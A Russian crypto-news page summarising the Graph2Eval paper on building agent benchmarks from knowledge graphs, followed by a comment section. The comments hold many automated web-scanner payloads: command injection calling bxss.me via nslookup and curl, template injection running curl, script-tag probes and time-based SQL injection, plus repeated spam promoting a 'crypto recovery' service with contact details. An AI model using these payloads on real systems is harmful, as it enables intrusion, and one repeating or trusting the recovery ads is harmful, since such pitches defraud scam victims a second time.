Этот сайт использует файлы cookies. Продолжая просмотр страниц сайта, вы соглашаетесь с использованием файлов cookies. Если вам нужна дополнительная информация, пожалуйста, посетите страницу Политика файлов Cookie
Subscribe
Прямой эфир
Cryptocurrencies: 9543 / Markets: 112792
Market Cap: $ 4 144 016 321 258 / 24h Vol: $ 196 655 936 213 / BTC Dominance: 58.512630380324%

Н Новости

Почему ИИ-агенты ошибаются в простых веб-задачах — и как граф знаний помогает им перестать быть тупыми

af9f98590e7f80264f25857cebb217c4.jpg

Традиционные подходы к обучению ИИ-агентов больше не работают. Это особенно заметно у агентов, которым нужно читать документы, разбирать схемы, кликать по сайтам и выполнять многошаговые сценарии. Ручная разметка быстро устаревает и обходится дорого. Попытки автоматизировать генерацию задач с помощью LLM уже ведутся, но чаще всё сводится к простым форматам «вопрос–ответ», которые не учат реальной интерактивности и инструментальности.

Команда Graph2Eval предложила аккуратный выход: строить задачи прямо из графа знаний, собранного по документам и веб‑страницам. Граф становится не только хранилищем фактов, но и пространством задач. Из его кусочков можно автоматически получать проверяемые сценарии — как на понимание документов, так и на взаимодействие с сайтами.

Схема генерации: от парсинга данных к построению графа, сэмплингу подграфов и созданию задач.
Схема генерации: от парсинга данных к построению графа, сэмплингу подграфов и созданию задач.

Идея: задачи из графа знаний

Граф знаний объединяет:

  • элементы документов и веб‑страниц (абзацы, таблицы, заголовки, ссылки, формы, кнопки);

  • связи между ними: структурные, семантические и интерактивные.

Далее идут два вида задач:

  • документные — извлечение фактов, сравнение, многократные переходы по ссылкам, работа с таблицами и иллюстрациями;

  • веб‑взаимодействия — поиск, фильтрация, заполнение форм, переходы по результатам, работа с модальными окнами.

Сложность контролируется размером и типом подграфа: чем больше шагов и отношений, тем богаче сценарий. Для веб‑части используется механизм мета‑путей: это шаблоны взаимодействий уровня “поиск → фильтр → карточка”, которые автоматически сопоставляются с конкретным DOM и разворачиваются в пошаговые действия агента (input, click, navigate).

Как это устроено изнутри

  • Парсинг. Документы сохраняют структуру и подписи, веб‑страницы — DOM и скриншоты. Качество источников фильтруется правилами и LLM.

  • Граф. Узлы содержат текст и визуальные признаки, рёбра кодируют порядок, включение, ссылки, а в вебе — навигацию и интеракции.

  • Сэмплинг подграфов. Для документных задач выбираются смысловые фрагменты, для веб — “семена” (формы, кнопки) и их окрестности.

  • Генерация. Шаблоны задач заполняются переменными из подграфа и метаданными. Веб‑кейсы собираются из мета‑путей в исполняемые цепочки.

  • Отбор. Многоступенчатая фильтрация учитывает достижимость, новизну и покрытие разных паттернов. Это позволяет держать баланс между качеством и разнообразием.

Пропорции охвата измерений задач Web и Doc при оптимизации.
Пропорции охвата измерений задач Web и Doc при оптимизации.

Что получилось на практике

Авторы собрали Graph2Eval‑Bench: 1 319 задач — 1 002 документных и 317 взаимодействия с вебом. Источники включают 16 документов и 8 сайтов; в среднем 83,5 задачи на документ и 48,4 — на сайт. Типов задач: 12 для документов и 7 для веба. Среднее время генерации — 34,87 с для документов и 95,51 с для веба, что в разы быстрее ручного конструирования.

Обзор набора данных Graph2Eval-Bench.
Обзор набора данных Graph2Eval-Bench.
Сравнение времени обработки для документов и веб‑сайтов.
Сравнение времени обработки для документов и веб‑сайтов.

Как повели себя модели и агенты

Документные задачи

Сравнивали одиночного агента и мультиагентную систему с RAG. По F1 и ROUGE‑L лучше всех выступил GPT‑4o; по оценке LLM‑судьи лидировал Deepseek‑V3. Интересная деталь: мультиагентная схема не дала устойчивого прироста, а иногда чуть ухудшала качество при росте токенов. Различия между размерами моделей выражены чётко — набор действительно дифференцирует.

Оценки LLM‑судьи по типам задач и моделям.
Оценки LLM‑судьи по типам задач и моделям.
F1 и ROUGE‑L по типам задач и моделям.
F1 и ROUGE‑L по типам задач и моделям.

Веб‑взаимодействия

Сравнивались два агента: SoM (визуальные метки) и Agent S 2.5 (рефлексия и память). Agent S 2.5 почти везде лучше. На gemini‑2.5‑flash общий успех: SoM — 14,51%, Agent S 2.5 — 69,20%. Qwen2.5‑VL‑72B занял второе место, gpt‑4o‑mini оказался конкурентным на отдельных подзадачах. Модели меньшего размера заметно слабее, что снова показывает дифференцирующую способность бенчмарка. Вывод напрашивается: рефлексия на этапе выполнения и более богатая память помогают агентам устойчивее проходить многошаговые веб‑сценарии.

Производительность комбинаций агент–модель на Graph2Eval‑Bench.
Производительность комбинаций агент–модель на Graph2Eval‑Bench.
Кейс‑стади агента S на веб‑наборе.
Кейс‑стади агента S на веб‑наборе.

Почему это важно

  • Граф как “пространство задач” объединяет документы и веб в единую логику и даёт контроль над сложностью.

  • Появляется автоматическая генерация интерактивных веб‑кейсов — редкая возможность для честной проверки агентов.

  • Пайплайн масштабируется и воспроизводим: можно обновлять бенчмарк вместе с изменением источников, не переписывая всё вручную.

  • Многомерная оценка (одиночный агент, мультиагентная система, веб‑агент) выявляет реальные пробелы — в рассуждении, кооперации и интерактивности.

Куда двигаться дальше

Авторы планируют добавить формальные политики безопасности и сборку проверяемых безопасных кейсов, а также использовать структуру графа для точной детекции ошибок. Это поможет не только мерить “общий балл”, но и объяснять, где именно агент теряется: в поиске нужного узла, в логической связке фактов или в управлении интерфейсом.

📜 Полная статья

💾 Код

***

Если вам интересна тема ИИ, подписывайтесь на мой Telegram‑канал — там я регулярно делюсь инсайтами по внедрению ИИ в бизнес, запуску ИИ-стартапов и объясняю, как работают все эти ИИ-чудеса.

Источник

  • 09.10.25 08:08 pHqghUme

    can I ask you a question please?&echo nrqmto$()\ aadrei\nz^xyu||a #' &echo nrqmto$()\ aadrei\nz^xyu||a #|" &echo nrqmto$()\ aadrei\nz^xyu||a #

  • 09.10.25 08:08 pHqghUme

    |echo oljujl$()\ pbqbzp\nz^xyu||a #' |echo oljujl$()\ pbqbzp\nz^xyu||a #|" |echo oljujl$()\ pbqbzp\nz^xyu||a #

  • 09.10.25 08:08 pHqghUme

    can I ask you a question please?|echo qswrbu$()\ ovnycc\nz^xyu||a #' |echo qswrbu$()\ ovnycc\nz^xyu||a #|" |echo qswrbu$()\ ovnycc\nz^xyu||a #

  • 09.10.25 08:08 pHqghUme

    expr 9000227416 - 917575

  • 09.10.25 08:08 pHqghUme

    is it ok if I upload an image?

  • 09.10.25 08:08 pHqghUme

    (nslookup -q=cname hitrirljyvgim44c57.bxss.me||curl hitrirljyvgim44c57.bxss.me))

  • 09.10.25 08:08 pHqghUme

    $(nslookup -q=cname hitnaasjhmbqf44699.bxss.me||curl hitnaasjhmbqf44699.bxss.me)

  • 09.10.25 08:08 pHqghUme

    &nslookup -q=cname hitdjgcbtalqm528b9.bxss.me&'\"`0&nslookup -q=cname hitdjgcbtalqm528b9.bxss.me&`'

  • 09.10.25 08:08 pHqghUme

    &(nslookup -q=cname hitgrfzhgegxdb7bdf.bxss.me||curl hitgrfzhgegxdb7bdf.bxss.me)&'\"`0&(nslookup -q=cname hitgrfzhgegxdb7bdf.bxss.me||curl hitgrfzhgegxdb7bdf.bxss.me)&`'

  • 09.10.25 08:08 pHqghUme

    |(nslookup -q=cname hitfmymffseet6e8b2.bxss.me||curl hitfmymffseet6e8b2.bxss.me)

  • 09.10.25 08:08 pHqghUme

    `(nslookup -q=cname hitohduurqhba06a59.bxss.me||curl hitohduurqhba06a59.bxss.me)`

  • 09.10.25 08:08 pHqghUme

    ;(nslookup -q=cname hitieevbtlzep92252.bxss.me||curl hitieevbtlzep92252.bxss.me)|(nslookup -q=cname hitieevbtlzep92252.bxss.me||curl hitieevbtlzep92252.bxss.me)&(nslookup -q=cname hitieevbtlzep92252.bxss.me||curl hitieevbtlzep92252.bxss.me)

  • 09.10.25 08:08 pHqghUme

    is it ok if I upload an image?

  • 09.10.25 08:08 pHqghUme

    |(nslookup${IFS}-q${IFS}cname${IFS}hitanwkhusxwr37069.bxss.me||curl${IFS}hitanwkhusxwr37069.bxss.me)

  • 09.10.25 08:09 pHqghUme

    &(nslookup${IFS}-q${IFS}cname${IFS}hitochckpfbtw00d29.bxss.me||curl${IFS}hitochckpfbtw00d29.bxss.me)&'\"`0&(nslookup${IFS}-q${IFS}cname${IFS}hitochckpfbtw00d29.bxss.me||curl${IFS}hitochckpfbtw00d29.bxss.me)&`'

  • 09.10.25 08:09 pHqghUme

    can I ask you a question please?

  • 09.10.25 08:09 pHqghUme

    is it ok if I upload an image?

  • 09.10.25 08:09 pHqghUme

    is it ok if I upload an image?

  • 09.10.25 08:09 pHqghUme

    e

  • 09.10.25 08:11 pHqghUme

    e

  • 09.10.25 08:11 pHqghUme

    e

  • 09.10.25 08:11 pHqghUme

    e

  • 09.10.25 08:11 pHqghUme

    can I ask you a question please?

  • 09.10.25 08:12 pHqghUme

    can I ask you a question please?

  • 09.10.25 08:12 pHqghUme

    can I ask you a question please?

  • 09.10.25 08:12 pHqghUme

    is it ok if I upload an image?

  • 09.10.25 08:13 pHqghUme

    can I ask you a question please?'"()&%<zzz><ScRiPt >6BEP(9887)</ScRiPt>

  • 09.10.25 08:13 pHqghUme

    {{_self.env.registerUndefinedFilterCallback("system")}}{{_self.env.getFilter("curl hityjalvnplljd6041.bxss.me")}}

  • 09.10.25 08:13 pHqghUme

    '"()&%<zzz><ScRiPt >6BEP(9632)</ScRiPt>

  • 09.10.25 08:13 pHqghUme

    can I ask you a question please?9425407

  • 09.10.25 08:13 pHqghUme

    is it ok if I upload an image?

  • 09.10.25 08:14 pHqghUme

    is it ok if I upload an image?

  • 09.10.25 08:16 pHqghUme

    e

  • 09.10.25 08:17 pHqghUme

    e

  • 09.10.25 08:17 pHqghUme

    e

  • 09.10.25 08:17 pHqghUme

    "+response.write(9043995*9352716)+"

  • 09.10.25 08:17 pHqghUme

    can I ask you a question please?

  • 09.10.25 08:17 pHqghUme

    can I ask you a question please?

  • 09.10.25 08:17 pHqghUme

    can I ask you a question please?

  • 09.10.25 08:18 pHqghUme

    can I ask you a question please?

  • 09.10.25 08:18 pHqghUme

    $(nslookup -q=cname hitconyljxgbe60e2b.bxss.me||curl hitconyljxgbe60e2b.bxss.me)

  • 09.10.25 08:18 pHqghUme

    is it ok if I upload an image?

  • 09.10.25 08:18 pHqghUme

    is it ok if I upload an image?

  • 09.10.25 08:18 pHqghUme

    |(nslookup -q=cname hitrwbjjcbfsjdad83.bxss.me||curl hitrwbjjcbfsjdad83.bxss.me)

  • 09.10.25 08:18 pHqghUme

    |(nslookup${IFS}-q${IFS}cname${IFS}hitmawkdrqdgobcdfd.bxss.me||curl${IFS}hitmawkdrqdgobcdfd.bxss.me)

  • 09.10.25 08:18 pHqghUme

    is it ok if I upload an image?

  • 09.10.25 08:19 pHqghUme

    is it ok if I upload an image?

  • 09.10.25 08:20 pHqghUme

    e

  • 09.10.25 08:20 pHqghUme

    e

  • 09.10.25 08:21 pHqghUme

    e

  • 09.10.25 08:21 pHqghUme

    e

  • 09.10.25 08:21 pHqghUme

    can I ask you a question please?

  • 09.10.25 08:22 pHqghUme

    can I ask you a question please?

  • 09.10.25 08:22 pHqghUme

    can I ask you a question please?

  • 09.10.25 08:22 pHqghUme

    is it ok if I upload an image?

  • 09.10.25 08:22 pHqghUme

    if(now()=sysdate(),sleep(15),0)

  • 09.10.25 08:22 pHqghUme

    can I ask you a question please?0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z

  • 09.10.25 08:23 pHqghUme

    can I ask you a question please?0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z

  • 09.10.25 08:23 pHqghUme

    can I ask you a question please?

  • 09.10.25 08:23 pHqghUme

    (select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/

  • 09.10.25 08:24 pHqghUme

    is it ok if I upload an image?

  • 09.10.25 08:24 pHqghUme

    e

  • 09.10.25 08:24 pHqghUme

    can I ask you a question please?-1 waitfor delay '0:0:15' --

  • 09.10.25 08:25 pHqghUme

    is it ok if I upload an image?

  • 09.10.25 08:25 pHqghUme

    e

  • 09.10.25 08:25 pHqghUme

    e

  • 09.10.25 08:25 pHqghUme

    e

  • 09.10.25 08:25 pHqghUme

    can I ask you a question please?9IDOn7ik'; waitfor delay '0:0:15' --

  • 09.10.25 08:26 pHqghUme

    can I ask you a question please?MQOVJH7P' OR 921=(SELECT 921 FROM PG_SLEEP(15))--

  • 09.10.25 08:26 pHqghUme

    e

  • 09.10.25 08:27 pHqghUme

    can I ask you a question please?64e1xqge') OR 107=(SELECT 107 FROM PG_SLEEP(15))--

  • 09.10.25 08:27 pHqghUme

    can I ask you a question please?ODDe7Ze5')) OR 82=(SELECT 82 FROM PG_SLEEP(15))--

  • 09.10.25 08:28 pHqghUme

    can I ask you a question please?'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'

  • 09.10.25 08:28 pHqghUme

    can I ask you a question please?'"

  • 09.10.25 08:28 pHqghUme

    can I ask you a question please?

  • 09.10.25 08:28 pHqghUme

    @@olQP6

  • 09.10.25 08:28 pHqghUme

    (select 198766*667891 from DUAL)

  • 09.10.25 08:28 pHqghUme

    (select 198766*667891)

  • 09.10.25 08:30 pHqghUme

    is it ok if I upload an image?

  • 09.10.25 08:33 pHqghUme

    can I ask you a question please?

  • 09.10.25 08:34 pHqghUme

    can I ask you a question please?

  • 09.10.25 08:34 pHqghUme

    if(now()=sysdate(),sleep(15),0)

  • 09.10.25 08:35 pHqghUme

    e

  • 09.10.25 08:36 pHqghUme

    is it ok if I upload an image?

  • 09.10.25 08:36 pHqghUme

    is it ok if I upload an image?

  • 09.10.25 08:37 pHqghUme

    is it ok if I upload an image?

  • 09.10.25 08:37 pHqghUme

    is it ok if I upload an image?

  • 09.10.25 08:37 pHqghUme

    e

  • 09.10.25 08:37 pHqghUme

    e

  • 09.10.25 08:40 pHqghUme

    can I ask you a question please?

  • 09.10.25 08:40 pHqghUme

    is it ok if I upload an image?

  • 09.10.25 08:41 pHqghUme

    e

  • 09.10.25 08:41 pHqghUme

    can I ask you a question please?

  • 09.10.25 08:42 pHqghUme

    can I ask you a question please?

  • 09.10.25 08:42 pHqghUme

    is it ok if I upload an image?

  • 09.10.25 08:42 pHqghUme

    e

  • 09.10.25 11:05 marcushenderson624

    Bitcoin Recovery Testimonial After falling victim to a cryptocurrency scam group, I lost $354,000 worth of USDT. I thought all hope was lost from the experience of losing my hard-earned money to scammers. I was devastated and believed there was no way to recover my funds. Fortunately, I started searching for help to recover my stolen funds and I came across a lot of testimonials online about Capital Crypto Recovery, an agent who helps in recovery of lost bitcoin funds, I contacted Capital Crypto Recover Service, and with their expertise, they successfully traced and recovered my stolen assets. Their team was professional, kept me updated throughout the process, and demonstrated a deep understanding of blockchain transactions and recovery protocols. They are trusted and very reliable with a 100% successful rate record Recovery bitcoin, I’m grateful for their help and highly recommend their services to anyone seeking assistance with lost crypto. Contact: [email protected] Phone CALL/Text Number: +1 (336) 390-6684 Email: [email protected] Website: https://recovercapital.wixsite.com/capital-crypto-rec-1

  • 09.10.25 11:05 marcushenderson624

    Bitcoin Recovery Testimonial After falling victim to a cryptocurrency scam group, I lost $354,000 worth of USDT. I thought all hope was lost from the experience of losing my hard-earned money to scammers. I was devastated and believed there was no way to recover my funds. Fortunately, I started searching for help to recover my stolen funds and I came across a lot of testimonials online about Capital Crypto Recovery, an agent who helps in recovery of lost bitcoin funds, I contacted Capital Crypto Recover Service, and with their expertise, they successfully traced and recovered my stolen assets. Their team was professional, kept me updated throughout the process, and demonstrated a deep understanding of blockchain transactions and recovery protocols. They are trusted and very reliable with a 100% successful rate record Recovery bitcoin, I’m grateful for their help and highly recommend their services to anyone seeking assistance with lost crypto. Contact: [email protected] Phone CALL/Text Number: +1 (336) 390-6684 Email: [email protected] Website: https://recovercapital.wixsite.com/capital-crypto-rec-1

  • 09.10.25 11:05 marcushenderson624

    Bitcoin Recovery Testimonial After falling victim to a cryptocurrency scam group, I lost $354,000 worth of USDT. I thought all hope was lost from the experience of losing my hard-earned money to scammers. I was devastated and believed there was no way to recover my funds. Fortunately, I started searching for help to recover my stolen funds and I came across a lot of testimonials online about Capital Crypto Recovery, an agent who helps in recovery of lost bitcoin funds, I contacted Capital Crypto Recover Service, and with their expertise, they successfully traced and recovered my stolen assets. Their team was professional, kept me updated throughout the process, and demonstrated a deep understanding of blockchain transactions and recovery protocols. They are trusted and very reliable with a 100% successful rate record Recovery bitcoin, I’m grateful for their help and highly recommend their services to anyone seeking assistance with lost crypto. Contact: [email protected] Phone CALL/Text Number: +1 (336) 390-6684 Email: [email protected] Website: https://recovercapital.wixsite.com/capital-crypto-rec-1

  • 09.10.25 11:05 marcushenderson624

    Bitcoin Recovery Testimonial After falling victim to a cryptocurrency scam group, I lost $354,000 worth of USDT. I thought all hope was lost from the experience of losing my hard-earned money to scammers. I was devastated and believed there was no way to recover my funds. Fortunately, I started searching for help to recover my stolen funds and I came across a lot of testimonials online about Capital Crypto Recovery, an agent who helps in recovery of lost bitcoin funds, I contacted Capital Crypto Recover Service, and with their expertise, they successfully traced and recovered my stolen assets. Their team was professional, kept me updated throughout the process, and demonstrated a deep understanding of blockchain transactions and recovery protocols. They are trusted and very reliable with a 100% successful rate record Recovery bitcoin, I’m grateful for their help and highly recommend their services to anyone seeking assistance with lost crypto. Contact: [email protected] Phone CALL/Text Number: +1 (336) 390-6684 Email: [email protected] Website: https://recovercapital.wixsite.com/capital-crypto-rec-1

Для участия в Чате вам необходим бесплатный аккаунт pro-blockchain.com Войти Регистрация
Есть вопросы?
С вами на связи 24/7
Help Icon